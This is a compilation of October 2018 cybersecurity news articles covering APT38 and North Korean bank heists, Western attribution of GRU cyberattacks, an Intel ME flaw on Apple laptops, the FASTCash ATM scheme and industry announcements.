The group, tracked by FireEye as APT38, focuses on targeting financial institutions, and the company’s researchers estimate that it has stolen at least a hundred million dollars from banks worldwide. It’s believed that the group has attempted to steal over $1.1 billion.

Much of the North Korea-linked cyber activity has been attributed to the notorious Lazarus, but cybersecurity firms have begun to realize that, similar to other countries, there are actually several groups that appear to be launching attacks on behalf of the government. The fact that their tools, techniques and infrastructure often overlap makes it difficult to accurately attribute an operation to a certain group.

FireEye noted that there are many similarities between APT38 and attacks launched by other North Korea-linked groups, including Lazarus and the activity it tracks as TEMP.Hermit. However, it believes APT38’s tools and its tactics, techniques and procedures (TTPs) are distinct enough for it to be tracked separately.

Some other security firms have also noticed that the financially motivated attacks linked to Lazarus may have actually been carried out by a subgroup of Lazarus. Kaspersky has tracked this subgroup as Bluenoroff, while CrowdStrike has dubbed it Stardust Chollima. CrowdStrike has been tracking a total of four subgroups, which it has named Stardust Chollima, Silent Chollima, Labyrinth Chollima and Ricochet Chollima.

According to FireEye, APT38 has been active since at least 2014 and it has been observed targeting over 16 organizations across 11 countries – researchers believe the actual number of targets may be higher.

APT 38 targets

Several of these attacks made headlines in the past years and the researchers who analyzed them reported seeing significant similarities to Lazarus campaigns. However, FireEye says the attacks were actually carried out by APT38. The attacks, many of which targeted the SWIFT banking system, were aimed, among others, at Vietnam’s TP Bank in 2015, Bangladesh’s central bank in 2016, Taiwan’s Far Eastern International in 2017, Bancomext in Mexico in 2018, and Banco de Chile also in 2018.

“Attribution to both the ‘Lazarus’ group and TEMP.Hermit was made with varying levels of confidence primarily based on similarities in malware being leveraged in identified operations,” FireEye said in its report on APT38. “Over time these malware similarities diverged, as did targeting, intended outcomes, and TTPs, almost certainly indicating that TEMP.Hermit activity is made up of multiple operational groups primarily linked together with shared malware development resources and North Korean state sponsorship.”

FireEye believes that several other attacks that made the news – involving banks in Africa, Vietnam, Malaysia, the Philippines, Ecuador, and India – may have also been carried out by APT38 based on timing, location, malware, general TTPs and the fact that they targeted SWIFT systems.

Unlike other North Korean threat groups, APT38’s attacks are almost exclusively cyber heists whose likely goal is to raise money for the regime. On the other hand, unlike typical cybercrime operations, APT38’s campaigns are more similar to espionage.

“APT38 executes sophisticated bank heists typically featuring long planning, extended periods of access to compromised victim environments preceding any attempts to steal money, fluency across mixed operating system environments, the use of custom developed tools, and a constant effort to thwart investigations capped with a willingness to completely destroy compromised machines afterwards,” FireEye said.

Experts believe APT38 was created by North Korea as a result of the sanctions imposed on the country. The group was first spotted in February 2014, roughly one year after the UN blocked the regime from making bulk cash transfers and restricting its ties to international banking systems. As more and more sanctions were imposed on North Korea in the following years, APT38 escalated its activities and the frequency of attacks increased.

FireEye has warned that APT38 continues to be active, even after the United States named and charged an alleged North Korean hacker who is said to have been involved in the development of Lazarus tools.


Canada blames Russia for cyber attacks against its structures
5.10.2018 securityweek
BigBrothers

The Government of Canada blamed the GRU, the Russian military’s intelligence agency, for cyber attacks at the Montreal-based World Anti-Doping Agency.
“The government of Canada assesses with high confidence that the Russian military’s intelligence arm, the GRU, was responsible” for these cyber attacks, the foreign ministry said in a statement.

[cyber attacks are] “part of a broader pattern of activities by the Russian government that lie well outside the bounds of appropriate behavior, demonstrate a disregard for international law and undermine the rules-based international order.”

“all those who value this order to come together in its defence.”

Canada and its allies accused Russia of its aggressive cyber strategy that continuously attempts to interfere in the politic of foreign states. The allies

Allies blamed the Kremlin of being responsible for cyber attacks that an April aimed at the official networks of the Organisation for the Prohibition of Chemical Weapons (OPCW).

In September the Dutch-based NRC newspaper and Swiss daily Tages-Anzeiger reported the Dutch intelligence services arrested two alleged Russian spies working for Russia’s GRU military intelligence service on suspicion of planning to hack the Spiez laboratory near Bern.

The laboratory conducts investigations for a global chemical arms watchdog, the Organisation for the Prohibition of Chemical Weapons (OPCW), its researchers were investigating the poisoning of agent Sergei Skripal and his daughter in Salisbury.

The two agents carried equipment to hack into the network of the laboratory to spy on the activity of its researchers.

The Netherlands expelled four alleged agents, while the United States charged seven Russian agents with hacking the World Anti-Doping Agency (WADA) in 2016.

The foreign ministry added that in the same period the Canadian Centre for Ethics in Sport was “compromised by malware enabling unauthorized access to the Centre’s network,”

Britain and Australia also accused the Russian military intelligence of running a massive espionage campaign.


CVE-2018-4251 – Apple did not disable Intel Manufacturing Mode in its laptops
5.10.2018 securityweek
Vulnerebility

Positive Technologies while analyzing Intel Management Engine (ME) discovered that Apple did not disable Intel Manufacturing Mode in its laptops
Experts from security firm Positive Technologies while analyzing Intel Management Engine (ME) discovered that Apple forgot did not lock it in laptops.

The Intel Management Engine consists of a microcontroller that works with the Platform Controller Hub chip, in conjunction with integrated peripherals, it is a critical component that handles data exchanged between the processor and peripherals.

For this reason, security experts warned in the past of the risks for Intel Management Engine vulnerabilities. An attacker can exploit a flaw in the Intel ME to establish a backdoor on the affected system and gain full control over it.

Last year the same group of experts at Positive Technologies discovered an undocumented configuration setting that disabled the Intel Management Engine.

The team also published a proof-of-concept exploit code for a vulnerability in the Intel Management Engine JTAG.

Last year, experts from the Electronic Frontier Foundation asked Intel to provide a way to disable the IME.

In August 2017, the experts from Positive Technologies (Dmitry Sklyarov, Mark Ermolov, and Maxim Goryachy) discovered a way to disable the Intel Management Engine 11 via an undocumented mode.

The researchers discovered that it is possible to turn off the Intel ME by setting the undocumented high assurance platform (HAP) bit to 1 in a configuration file.

The experts discovered that the security framework was developed by the US National Security Agency … yes the NSA!

This week, researchers Maxim Goryachy and Mark Ermolov published a blog post that revealed Chipzilla’s ME contains an undocumented Manufacturing Mode.

“Intel ME Manufacturing Mode is intended for configuration and testing of the end platform during manufacturing, and as such should be disabled (closed) before sale and shipment to users,” states the security duo.

“However, this mode and its potential risks are not described anywhere in Intel’s public documentation.”

The only way to access the Intel Manufacturing Mode is using a utility included in Intel ME System Tools software, that anyway isn’t available to the public. The software allows to configure platform settings in one-time programmable memory called Field Programming Fuses (FPF), an operation that is usually made before the shipment, and in ME’s internal MFS (Minux File System) on SPI (Serial Peripheral Interface) flash memory, via parameters known as CVARs (Configurable NVARs, Named Variables).

On older systems, prior to Apollo Lake, Intel maintained access rights for th Intel Management Engine, Gigabit Ethernet, and CPU separate.

In newer systems, the SPI controllers implement the Master Grant feature that could override the access rights declared in the SPI descriptor.

“What this means is that even if the SPI descriptor forbids host access to an SPI region of ME, it is possible for ME to still provide access,” the researchers explain.

Experts pointed out that device makers cannot disable the Manufacturing Mode opening the door to cyber attacks by a local attacker.

Ironically one of the major Intel customer, Apple, left Manufacturing Mode enabled, the issue was tracked as CVE-2018-4251.

Apple addressed the problem in June and fixed it with the release of macOS High Sierra 10.13.5 update.

The security experts published a Python code on GitHub to allow Intel to check whether Manufacturing Mode is enabled.

“Our research shows that Intel ME has a Manufacturing Mode problem, and that even giant manufacturers such as Apple are not immune to configuration mistakes on Intel platforms. Worse still, there is no public information on the topic, leaving end users in the dark about weaknesses that could result in data theft, persistent irremovable rootkits, and even “bricking” of hardware.” concludes the experts.
“We also suspect that the ability to reset ME without resetting the main CPU may lead to yet additional security issues, due to the states of the BIOS/UEFI and ME falling out of sync.”


UK, Australia Blame Russia for Bad Rabbit, Other Attacks
5.10.2018 securityweek
BigBrothers

The United Kingdom and Australia have officially blamed Russia for several high profile attacks, including the Bad Rabbit ransomware campaign.

A statement published by the U.K. government on Wednesday reveals that the country’s National Cyber Security Centre (NCSC) has linked several cyber threat actors to Russia’s GRU military intelligence service.

The NSCS believes that the GRU is behind the groups tracked by various security firms as APT28, Fancy Bear, Pawn Storm, Sofacy, Sednit, Cyber Caliphate, Cyber Berkut, BlackEnergy, Voodoo Bear, Strontium, Tsar Team and Sandworm. While many of these names represent the same threat actor, the line between the operations carried out by various Russian groups often gets blurred, as shown by the recent VPNFilter attack.

The NCSC says that the GRU is “almost certainly” responsible for the Bad Rabbit ransomware attack in October 2017, the August 2017 attack on the World Anti-Doping Agency (WADA), the 2016 attack on the U.S. Democratic National Committee (DNC), and an attack on a small TV station in the UK in the summer of 2015. It’s worth noting that the U.S. has previously accused Russia of election-related hacks and even charged 12 intelligence officers.

“The GRU’s actions are reckless and indiscriminate: they try to undermine and interfere in elections in other countries; they are even prepared to damage Russian companies and Russian citizens. This pattern of behaviour demonstrates their desire to operate without regard to international law or established norms and to do so with a feeling of impunity and without consequences,” said British Foreign Secretary Jeremy Hunt. “Our message is clear: together with our allies, we will expose and respond to the GRU’s attempts to undermine international stability.”

The Australian government has accused Russia’s GRU for the same attacks, but admitted that Australia itself was not significantly impacted by any of the campaigns.

“Cyberspace is not the Wild West. The International Community – including Russia – has agreed that international law and norms of responsible state behaviour apply in cyberspace. By embarking on a pattern of malicious cyber behaviour, Russia has shown a total disregard for the agreements it helped to negotiate,” reads a statement from Australia’s prime minister and minister of foreign affairs.

Australia says there must be consequences for these types of actions and public attribution is only the first step.

“It is unprecedented that the government should so overtly point the finger directly at the GRU. They must be very confident of their facts, either due to some sort of technical ‘fingerprint’ in the attack vectors themselves, or perhaps through corroboration from various other intelligence sources,” Malcolm Taylor, Director Cyber Advisory at ITC Secure and a former senior British intelligence officer, told SecurityWeek.

“But I think it’s also important to consider who benefits from attacks against these specific targets - WADA, Ukraine and the West in general. The answer to that question of course includes, and may indeed be limited to, Russia and Russian foreign policy interests. The mention of western businesses as targets should also be a reminder that foreign intelligence services do engage in commercial cyber espionage and we all need to take appropriate steps to manage that risk,” Taylor added.


Hackers Earn $150,000 in Marine Corps Bug Bounty Program
5.10.2018 securityweek
Security

The U.S. Department of Defense’s sixth public bug bounty program, Hack the Marine Corps, has concluded, and white hat hackers who took part in the challenge earned more than $150,000.

Hack the Marine Corps was hosted by the HackerOne bug bounty platform and it ran for 20 days. Over 100 experts were invited to test the security of the Marine Corps’ public websites and services and they discovered nearly 150 unique vulnerabilities.

Of the total number of flaws, roughly half were reported during a live hacking event that took place at the DEF CON conference in August. More than $80,000 was awarded for the security holes discovered during the event.

“Hack the Marine Corps was an incredibly valuable experience,” said Major General Matthew Glavy, Commander of the U.S. Marine Corps Forces Cyberspace Command. “When you bring together this level of talent from the ethical hacker community and our Marines we can accomplish a great deal. What we learn from this program assists the Marine Corps in improving our warfighting platform. Our cyber team of Marines demonstrated tremendous efficiency and discipline, and the hacker community provided critical, diverse perspectives. The tremendous effort from all of the talented men and women who participated in the program makes us more combat ready and minimizes future vulnerabilities.”

The Pentagon and HackerOne have been organizing bug bounty programs since 2016, including Hack the Pentagon, Hack the Army, Hack the Air Force, and Hack the Defense Travel System.

The ethical hackers who took part in these challenges discovered more than 5,000 vulnerabilities in government systems, for which they earned over $500,000.


Wickr Announces General Availability of Anti-Censorship Tool
5.10.2018 securityweek
Security

As the balkanization of the internet continues, traveling businessmen are left with concerns over the integrity of their communications from some regions of the globe. Increasing censorship, blocking and other restrictions in many world regions have left internet users unprotected because secure communications are banned.

In some countries such as Saudi Arabia and UAE, says Wickr, enterprise deployments may be difficult because of the national Telco's monopoly over networks. They restrict various end points and UDP, so all traffic goes through them for monetization or tracking purposes. As a result, some customers have to deploy outside of their region (such as India), to avoid having UDP packets get rate-limited and their tools rendered unusable.

To help solve this problem, Wickr has announced the general availability of its secure open access protocol to circumvent censorship for all Wickr Me and Wickr Pro (via admin console) users. It combines unrestricted access and end-to-end encrypted collaboration features in a single app, no matter where users are located.

The enterprise version of the tool was announced in August 2018, with the promise that it would be rolled out to other versions of Wickr, including the free version, in the future. That roll out is confirmed today. The tool comes from Wickr's collaboration with Psiphon. Psiphon describes it as a circumvention tool that utilizes VPN, SSH and HTTP Proxy technology to provide uncensored access to Internet content.

The Psiphon technology uses SSH as its core protocol. This prevents deep packet inspection by ISPs. On top of this, Psiphon has added an obfuscated-openssh layer that transforms the SSH handshake into a random stream, and adds random padding to the handshake.

When a Wickr client starts with Psiphon enabled, the client attempts to connect to up to 10 different servers simultaneously, and uses the first to be fully established. This minimizes user wait time if any of the servers are blocking certain protocols, are blocked by their address, or already running at full capacity and rejecting new connections.

This last point is important. It means that the Wickr/Psiphon product has value beyond just foreign travel. Domestic mobile workers often use low capacity public wifi with limited security. Wickr's encryption can secure the content, while Psiphon ensures minimal delay in the communications.

It is important to note that the Wickr/Psiphon tool is a communication optimization, security and anti-censorship tool -- it is not an anti-law enforcement tool. "Wickr provides full transparency to both law enforcement and our users on the type of metadata that is collected through our products, as well as any data requests we receive," CEO & President at Wickr told SecurityWeek. "The data we capture is very limited in scope to protect user privacy but done in a way that also supports law enforcement."

ISPs, however, remain the weak link in any secret communication. "As to ISPs," continued Wallenstrom, "they are in the business of monetizing user data and were given the green light to do so last year." They can legally collect and sell the data they collect -- but their storage of collected data presents a further risk.

"The risk to users of exposure could be very high and breaches over the years have pretty much confirmed this," he continued. "Short of stopping customer data collection and monetization altogether, ISPs should be transparent about what information they take and ensure proper safeguards are in place. In turn, users can limit their exposure by using privacy tools such as a VPN that masks browsing data from ISPs and encrypted messengers that protect sensitive communications from getting caught in a data sweep."

Psiphon was started more than 10 years ago at Citizen Lab, one of the worldís top research hubs dedicated to building anti-surveillance tools. Psiphon was responsible for keeping access to Telegram during Iranian protests, WhatsApp in Brazil and other tools. "There are probably 30 to 40 countries in the world where governments, ISPs and security agencies are all colluding together to control the local population and economy," Michael Hull, president of Psiphon Inc, told SecurityWeek. "This is the problem that Psiphon was founded to solve."

San Francisco-based Wickr was founded in 2011 by Chris Howell, Kara Coppa, Nico Sell, at Robert Statica. It has raised a total of $73 million in venture funding.


CloudKnox Raises $10.8 Million to Help Manage Cloud Privileges
5.10.2018 securityweek
IT

Cloud Security Company Raises $10.75 Million in Funding From ClearSky Security, Dell Technologies Capital and Foundation Capital

Losing control of accounts with elevated privileges is a major concern for all organizations, and can only be solved by enforcing a strict policy of least privilege. That is not easy, but even harder in hybrid cloud environments. It has been estimated that there are almost 8,000 separate actions -- or privileges -- available across AWS, Azure, Google Cloud and vSphere. Managing privilege to this amount of actions is almost impossible manually.

This is the argument behind startup firm CloudKnox Security. Founded in 2016 by Balaji Parimi and headquartered in the San Francisco Bay Area, CloudKnox has now raised $10.8 million in venture funding led by ClearSky Security with participation from Dell Technologies Capital and Foundation Capital. Dell Technologies Capital had been an investor in RedLock, which had raised a total of $12 million. Palo Alto Networks yesterday announced that it had agreed to acquire RedLock for approximately $173 million.

CloudKnox LogoCloudKnox delivers a platform that enables customers to manage the risk of over-provisioning privileges. "Enterprises today are focused on protecting their cloud environments by using tools that provide visibility into anomalous activity and then reacting to it," said Jay Leek, Managing Director at ClearSky Security and former Blackstone CISO. "Security leaders should approach the security of their cloud environments differently by getting ahead of the risks."

The CloudKnox platform uses activity-based access controls to detect identities (service accounts, APIs, bots, contractors or employees) with unused privileges based on actual activities versus static roles. It then allows the automatic revocation of unused high-risk privileges with a single click. The platform, announced the company, "autonomously prevents risks as it learns what activities identities are performing and enables organizations to dynamically and instantly revoke or grant privileges based on actual needs."

The iconic example of abused privilege can be seen in CodeSpaces, which was forced out of business when a hacker gained admin credentials and was able to delete the entire CodeSpaces AWS infrastructure, including backups.

"Today's dynamic infrastructure demands a different approach to manage risks," said Balaji Parimi, CEO and founder of CloudKnox Security. "One key stroke can deploy thousands of cloud workloads and can also destroy thousands of workloads and take down a business. Our approach is built on our belief that enterprises need a single cloud security platform that goes beyond visibility and provides a simple and flexible way to remediate and prevent risks without impacting productivity and trust."


U.S. Charges 7 Russian Intel Officers as West Condemns GRU
5.10.2018 securityweek
BigBrothers

The U.S. Justice Department on Thursday charged seven Russian intelligence officers with hacking anti-doping agencies and other organizations hours after Western officials leveled new accusations against Moscow's secretive GRU military spy agency.

Hours before the U.S. indictment was announced, Western nations accused the GRU of new cybercrimes, with Dutch and British officials labeling the intelligence agency "brazen" for allegedly targeting the international chemical weapons watchdog and the investigation into the 2014 downing of a Malaysian Airlines flight over eastern Ukraine.

The U.S. indictment said that the GRU targeted its victims because they had publicly supported a ban on Russian athletes in international sports competitions and because they had condemned Russia's state-sponsored athlete doping program.

Prosecutors said that the Russians also targeted a Pennsylvania-based nuclear energy company and an international organization that was investigating chemical weapons in Syria and the poisoning of a former GRU officer.

The indictment says the hacking was often conducted remotely. If that wasn't successful, the hackers would conduct "on-site" or "close access" hacking operations with trained GRU members traveling with sophisticated equipment to target their victims through Wi-Fi networks

The GRU's alleged hacking attempts on the Organization for the Prohibition of Chemical Weapons took place in April and were disrupted by authorities, Dutch Defense Minister Ank Bijleveld said. Four Russian intelligence officers were immediately expelled from the Netherlands, she said.

Speaking about Russia's hacking attempts into the MH17 crash investigation, she said: "We have been aware of the interest of Russian intelligence services in this investigation and have taken appropriate measures."

The cascade of condemnation — from the Australian, British and Dutch governments — does more than just point the finger at Moscow. It also ties together a series of norm-shattering spy operations that have straddled the physical world and the digital sphere.

The British ambassador to the Netherlands said that the men caught with spy gear outside The Hague-based OPCW, for example, were from the very same GRU section (Unit 26165) accused by American investigators of having broken into the Democratic National Committee's email and sowing havoc during the 2016 U.S. presidential election.

The OPCW, in turn, was investigating the poisoning of GRU defector Sergei Skripal in which the nerve agent Novichok was used, a bold operation that British authorities dissected in a minute-by-minute surveillance camera montage last month.

At the same time, Australian and British spies have now endorsed the American intelligence community's reported attribution of the catastrophic June 2017 cyberattack on Ukraine to the GRU. The malicious software outbreak briefly knocked out cash machines, gas stations, pharmacies and hospitals and, according to a secret White House assessment recently cited by Wired, dealt $10 billion worth of damage worldwide.

The hack and release of sports figures' medical data in 2016 and the downing of MH17 over eastern Ukraine in 2014 also allegedly carry the GRU's fingerprints. Dutch investigators said the snoopers nabbed outside the OPCW also appear to have logged into the Wi-Fi networks near the World Anti-Doping Agency and the Malaysian hotels where crash investigators had gathered.

Moscow has issued the latest in a series of denials, but the allegations leveled by Western intelligence agencies, supported by a wealth of surveillance footage and overwhelmingly confirmed by independent reporting, paint a picture of the GRU as an agency that routinely crosses red lines — and is increasingly being caught red-handed.

Moscow has denied the allegations, but Russia's interests were at stake in both cases: the OPCW was investigating reports that a Soviet-made nerve agent had been used against a Russian ex-spy in England, and Russia has been blamed by some for being involved in shooting down MH17.

The leaders of Britain and the Netherlands condemned the GRU for "reckless" activities and vowed to defend vital international agencies from Russian aggression.

"This attempt, to access the secure systems of an international organization working to rid the world of chemical weapons, demonstrates again the GRU's disregard for the global values and rules that keep us all safe," British Prime Minister Theresa May and Dutch counterpart Mark Rutte said in a joint statement.

The coordinated actions by both countries came hours before an expected U.S. indictment involving Russian attempts to hack into computer systems.

The Dutch and British blamed Russia's GRU for "brazen" activities across the globe and for trying to cover up Russia's alleged participation in the nerve agent poisoning in March of Skripal and his daughter, and the downing of MH17 over Ukraine that killing all 298 people on board during a period of intense fighting between Ukrainian government forces and pro-Russia rebels. Russia has consistently denied involvement in the events.

Britain's ambassador to the Netherlands, Peter Wilson, said the GRU would no longer be allowed to act with impunity. Britain blames the secretive military intelligence unit for the nerve agent attack in March on former Russian spy Skripal and his daughter, Yulia, in the English city of Salisbury.

He said Russia's actions against the Netherlands-based OPCW came as the agency was conducting an independent analysis of the nerve agent used against the Skripals. Britain says the nerve agent was Novichok, produced in the Soviet Union, a finding later confirmed by the chemical weapons watchdog.

Earlier, British Defense Secretary Gavin Williamson branded a series of global cyberattacks blamed on Russia as the reckless actions of a "pariah state," saying that the U.K. and its NATO allies would uncover such activities in the future.

"Where Russia acts in an indiscriminate and reckless way, where they have done in terms of these cyberattacks, we will be exposing them," Williamson told reporters in Brussels at talks with U.S. Defense Secretary Jim Mattis and their NATO counterparts.

Britain's National Cyber Security Center said Thursday that four new attacks are associated with the GRU as well as earlier security hacks.

It cites attacks on the World Anti-Doping Agency, Ukrainian transport systems, the 2016 U.S. presidential race and others as very likely the work of the GRU.

"We are going to actually make it clear that where Russia acts, we are going to be exposing that action," Williamson said.

"This is not the actions of a great power. This is the actions of a pariah state, and we will continue working with allies to isolate them; make them understand they cannot continue to conduct themselves in such a way," he said.

Earlier, Australian Prime Minister Scott Morrison and Foreign Minister Marise Payne issued a joint statement that Australian intelligence agencies agreed that GRU "is responsible for this pattern of malicious cyber activity." They said Australia wasn't significantly impacted, but the cyberattacks caused economic damage and disrupted civilian infrastructure in other places.


DHS Warns of Attacks on Managed Service Providers
5.10.2018 securityweek
BigBrothers

The United States Department of Homeland Security (DHS) this week issued an alert on ongoing activity from an advanced persistent threat (APT) actor targeting global managed service providers (MSPs).

The activity, DHS says, involves attempts to infiltrate the networks of global MSPs, which provide remote management of customer IT and end-user systems.

The use of MSP increases an organization’s virtual enterprise infrastructure footprint, but also creates a large attack surface for cyber criminals and nation-state actors, DHS’ United States Computer Emergency Readiness Team (US-CERT) points out.

The newly released alert, TA18-276B, is related to activity that DHS' National Cybersecurity and Communications Integration Center (NCCIC) warned about in April 2017.

The same activity was associated by security firms with a Chinese actor referred to as APT10, but which is also known as menuPass and Stone Panda. The group is believed to be state-sponsored.

Tracked since 2009, the group has historically targeted mainly Japanese entities. Last year, the group was observed targeting entities in at least fourteen countries, including the website of a prominent U.S. trade association.

The threat actor is known for the use of a broad range of malware families, including the PlugX RAT, ChChes, Quasar, RedLeaves, the UPPERCUT backdoor, NetTraveler (aka TravNet), and ZeroT.

“Since May 2016, APT actors have used various tactics, techniques, and procedures (TTPs) for the purposes of cyber espionage and intellectual property theft. APT actors have targeted victims in several U.S. critical infrastructure sectors, including Information Technology (IT), Energy, Healthcare and Public Health, Communications, and Critical Manufacturing,” DHS’ new alert reads.

DHS’ new technical alert also includes information on the protective measures organizations should take to mitigate the risks associated with their MSP, which could expose them to APT activity.

These include restricting access to networks and systems, using a dedicated Virtual Private Network (VPN) for MSP connection, using firewalls, implement best practices for password and permission management, and incorporate operational controls.


Google Turns on G Suite Alerts for State-Sponsored Attacks
5.10.2018 securityweek
Attack

After rolling out an option for G Suite administrators to receive alerts on suspected government-backed attacks on their users’ accounts, Google is now turning those alerts on by default.

Google has been long warning users of attacks that it believed might be the work of state-sponsored adversaries, but only sent those alerts to the impacted users. Starting in August, however, it rolled out a new option in G Suite to also notify admins on suspected attacks on their users.

When the feature was launched in August, however, G Suite administrators had to explicitly enable the alerts to receive them, and it appears that many weren’t aware of this and never turned the option on.

“We heard that many admins weren’t aware of this alert and so weren’t receiving this critical information. As a result, we’re going to turn these alerts ON for most admins starting October 10th, 2018,” Google now says.

Admins who do not want to receive these alerts can turn them off from the Reports > Manage alerts > Government-backed attack warning option in the Admin console. They will also have the ability to opt out at any time when receiving an alert email.

The search giant also reveals that the upcoming change won’t override alert preferences that have been explicitly changed before October 10. Basically, this means that the alerts will remain off for those who previously enabled and disabled them.

“If you’d prefer not to receive these alerts after October 10th, simply turn them on and then off again in the Admin console prior to that date,” Google says.

Admins should keep in mind that, the fact that they received such an alert doesn’t necessarily mean that an account has been compromised. The warning also arrives if Google only suspects that an account was targeted by a government-backed attack. Taking additional protective measures, however, is never a bad idea.


China Used Tiny Chips on US Computers to Steal Secrets: Report
5.10.2018 securityweek
BigBrothers

Tiny chips inserted in US computer equipment manufactured in China were used as part of a vast effort by Beijing to steal US technology secrets, a published report said Thursday.

The Bloomberg News report said the chips, the size of a grain of rice, were used on equipment made for Amazon, which first alerted US authorities, and Apple, and possibly for other companies and government agencies.

Bloomberg said a three-year secret investigation, which remains open, enabled spies to create a "stealth doorway" into computer equipment, a hardware-based entry that would be more effective and harder to detect than a software hack.

Citing unnamed US officials, Bloomberg said a unit of the People's Liberation Army were involved the operation that placed the chips on equipment manufactured in China for US-based Super Micro Computer Inc.

Supermicro, according to Bloomberg, also manufactured equipment for Department of Defense data centers, the CIA's drone operations, and onboard networks of Navy warships.

The report said Amazon discovered the problem when it acquired software firm Elemental and began a security review of equipment made for Elemental by California-based Supermicro.

According to Bloomberg, the spy chips were designed for motherboards -- the nerve centers for computer equipment -- used in data centers operated by Apple, Amazon Web Services and others.

Apple said in a statement it "has never found malicious chips, 'hardware manipulations' or vulnerabilities purposely planted in any server."

A statement by Amazon to AFP said that "at no time, past or present, have we ever found any issues relating to modified hardware or malicious chips in Supermicro motherboards in any Elemental or Amazon systems.‎"

Supermicro could not immediately be reached for comment, but Bloomberg said the firm denied any knowledge of the espionage or investigation.


CVE-2018-4251 – Apple did not disable Intel Manufacturing Mode in its laptops
4.10.2018 securityaffairs
Vulnerebility

Positive Technologies while analyzing Intel Management Engine (ME) discovered that Apple did not disable Intel Manufacturing Mode in its laptops
Experts from security firm Positive Technologies while analyzing Intel Management Engine (ME) discovered that Apple forgot did not lock it in laptops.

The Intel Management Engine consists of a microcontroller that works with the Platform Controller Hub chip, in conjunction with integrated peripherals, it is a critical component that handles data exchanged between the processor and peripherals.

For this reason, security experts warned in the past of the risks for Intel Management Engine vulnerabilities. An attacker can exploit a flaw in the Intel ME to establish a backdoor on the affected system and gain full control over it.

Last year the same group of experts at Positive Technologies discovered an undocumented configuration setting that disabled the Intel Management Engine.

The team also published a proof-of-concept exploit code for a vulnerability in the Intel Management Engine JTAG.

Last year, experts from the Electronic Frontier Foundation asked Intel to provide a way to disable the IME.

In August 2017, the experts from Positive Technologies (Dmitry Sklyarov, Mark Ermolov, and Maxim Goryachy) discovered a way to disable the Intel Management Engine 11 via an undocumented mode.

The researchers discovered that it is possible to turn off the Intel ME by setting the undocumented high assurance platform (HAP) bit to 1 in a configuration file.

The experts discovered that the security framework was developed by the US National Security Agency … yes the NSA!

This week, researchers Maxim Goryachy and Mark Ermolov published a blog post that revealed Chipzilla’s ME contains an undocumented Manufacturing Mode.

“Intel ME Manufacturing Mode is intended for configuration and testing of the end platform during manufacturing, and as such should be disabled (closed) before sale and shipment to users,” states the security duo.

“However, this mode and its potential risks are not described anywhere in Intel’s public documentation.”

The only way to access the Intel Manufacturing Mode is using a utility included in Intel ME System Tools software, that anyway isn’t available to the public. The software allows to configure platform settings in one-time programmable memory called Field Programming Fuses (FPF), an operation that is usually made before the shipment, and in ME’s internal MFS (Minux File System) on SPI (Serial Peripheral Interface) flash memory, via parameters known as CVARs (Configurable NVARs, Named Variables).

On older systems, prior to Apollo Lake, Intel maintained access rights for th Intel Management Engine, Gigabit Ethernet, and CPU separate.

In newer systems, the SPI controllers implement the Master Grant feature that could override the access rights declared in the SPI descriptor.

“What this means is that even if the SPI descriptor forbids host access to an SPI region of ME, it is possible for ME to still provide access,” the researchers explain.

Experts pointed out that device makers cannot disable the Manufacturing Mode opening the door to cyber attacks by a local attacker.

Ironically one of the major Intel customer, Apple, left Manufacturing Mode enabled, the issue was tracked as CVE-2018-4251.

Apple addressed the problem in June and fixed it with the release of macOS High Sierra 10.13.5 update.

The security experts published a Python code on GitHub to allow Intel to check whether Manufacturing Mode is enabled.

“Our research shows that Intel ME has a Manufacturing Mode problem, and that even giant manufacturers such as Apple are not immune to configuration mistakes on Intel platforms. Worse still, there is no public information on the topic, leaving end users in the dark about weaknesses that could result in data theft, persistent irremovable rootkits, and even “bricking” of hardware.” concludes the experts.
“We also suspect that the ability to reset ME without resetting the main CPU may lead to yet additional security issues, due to the states of the BIOS/UEFI and ME falling out of sync.”


Hidden Cobra APT used the new ATM cash-out scheme FASTCash to hit banks worldwide
4.10.2018 securityaffairs
APT

A joint technical alert from the DHS, the FBI, and the Treasury warning about a new ATM cash-out scheme, dubbed “FASTCash,” used by Hidden Cobra APT.
The US-CERT has released a joint technical alert from the DHS, the FBI, and the Treasury warning about a new ATM cash-out scheme, dubbed “FASTCash,” being used by the prolific North Korean APT hacking group known as Hidden Cobra (aka Lazarus Group and Guardians of Peace).

The activity of the Lazarus Group surged in 2014 and 2015, its members used mostly custom-tailored malware in their attacks and experts that investigated on the crew consider it highly sophisticated.

This threat actor has been active since at least 2009, possibly as early as 2007, and it was involved in both cyber espionage campaigns and sabotage activities aimed to destroy data and disrupt systems.

The group is considered responsible for the massive WannaCry ransomware attack, a string of SWIFT attacks in 2016, and the Sony Pictures hack.

According to the report published by the US-CERT, Hidden Cobra has been using the FASTCash technique since at least 2016, the APT group targets bank infrastructure to cash out ATMs.

Government experts analyzed 10 samples of malware involved in FASTCash attacks, state-sponsored hackers used them to compromise payment “switch application servers” within the targeted banks to facilitate fraudulent transactions.

“FASTCash schemes remotely compromise payment switch application servers within banks to facilitate fraudulent transactions. The U.S. Government assesses that HIDDEN COBRA actors will continue to use FASTCash tactics to target retail payment systems vulnerable to remote exploitation.” states the report.

“According to a trusted partner’s estimation, HIDDEN COBRA actors have stolen tens of millions of dollars. In one incident in 2017, HIDDEN COBRA actors enabled cash to be simultaneously withdrawn from ATMs located in over 30 different countries. In another incident in 2018, HIDDEN COBRA actors enabled cash to be simultaneously withdrawn from ATMs in 23 different countries.”

Switch application server communicates with the core banking system to validate user’s bank account details for a requested transaction.

HIDDEN COBRA attackers deployed legitimate scripts on compromised switch application servers to intercept and reply to financial request messages with fraudulent but legitimate-looking affirmative response messages.

Experts noticed that all of the compromised switch application servers were running unsupported IBM Advanced Interactive eXecutive (AIX) operating system versions.

At the time, the infection vector is still unknown, anyway, there are no evidence attackers successfully exploited the AIX operating system in these incidents.

“HIDDEN COBRA actors exploited the targeted systems by using their knowledge of International Standards Organization (ISO) 8583—the standard for financial transaction messaging—and other tactics.” continues the report.

“HIDDEN COBRA actors most likely deployed ISO 8583 libraries on the targeted switch application servers. Malicious threat actors use these libraries to help interpret financial request messages and properly construct fraudulent financial response messages.”

FASTCash Hidden Cobra

Most accounts used to initiate the transactions had a minimal activity or zero balances.
The FASTCash cash-out scheme was used to target banks in Africa and Asia, while U.S. authorities are still investigating incidents in the country that may be linked with this technique.

Experts believe APT threat actors carried out spear-phishing attacks against the bank, malicious messages used Windows executable.

The malicious code was used for lateral movements aimed at deploying malware onto the payment switch application server.

US-CERT provided mitigation recommendations for Institutions with Retail Payment Systems, including the implementation of two-factor authentication for any access to the switch application server.

Further details, including IoCs, are reported in the alert.


APT38 is behind financially motivated attacks carried out by North Korea
